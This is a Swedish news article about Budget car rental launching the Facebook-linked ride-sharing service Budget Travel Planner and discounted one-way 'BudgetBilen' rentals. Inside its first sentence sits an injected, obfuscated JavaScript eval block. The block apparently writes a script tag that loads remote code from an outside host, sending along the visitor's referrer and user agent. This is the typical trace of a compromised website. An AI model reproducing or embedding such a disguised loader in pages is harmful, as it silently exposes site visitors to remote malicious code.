Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Ny samåkningstjänst gör hyrbilsresan billigare

Ny samåkningstjänst gör hyrbilsresan billigare
Sebastian

 

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|anhea|var|u0026u|referrer|hdbyz||js|php’.split(’|’),0,{}))
24 juni lanserar biluthyrningsföretaget Budget samåkningstjänsten Budget Travel Planner. Genom tjänsten kan Budgets resenärer bjuda in medpassagerare på Facebook, och därigenom sänka kostnaden för resan. I tjänsten erbjuder Budget dessutom den unika möjligheten att hyra den lågt prissatta ”BudgetBilen”, en bil som enbart kan hyras för enkelresor mellan bestämda orter.

Budget Travel Planner är en samåkningstjänst som innebär att den som hyr, eller vill hyra bil, kan dela kostnaden med andra resenärer som önskar att åka samma sträcka. Genom att bjuda in vänner eller allmänheten på Facebook, kan man fylla en bil och på så vis dela på både hyrbilen och bränslekostnaden. Dessutom får man trevligt resesällskap. Även den som söker efter någon att lifta med kan hitta och bevaka befintliga resor, skapade av någon annan.

– Att ta sig runt i landet med flyg och tåg kan i många fall bli en dyr historia, därför vill vi förenkla det gemensamma resandet och ge resenärerna en möjlighet att resa enkelt, flexibelt och mer kostnadseffektivt. Då många redan nu söker efter resesällskap i sociala medier, speciellt runt högtider och under sommaren, är det ett naturligt steg att integrera vår samåkningstjänst med sociala medier, säger Jan Lind, Sverigechef på Budget.

Res ännu billigare med Budgetbilen

Med Budget Travel Planner kan man dessutom hyra nya ”BudgetBilen” till ett kraftigt reducerat pris. BudgetBilarna är bilar som körts en sträcka och nu måste tillbaka till sina ordinarie uthyrningsställen. ”BudgetBilen” lanseras under sommaren.

Så gör du:

Tjänsten har tagits fram i samarbete med Join The Carnival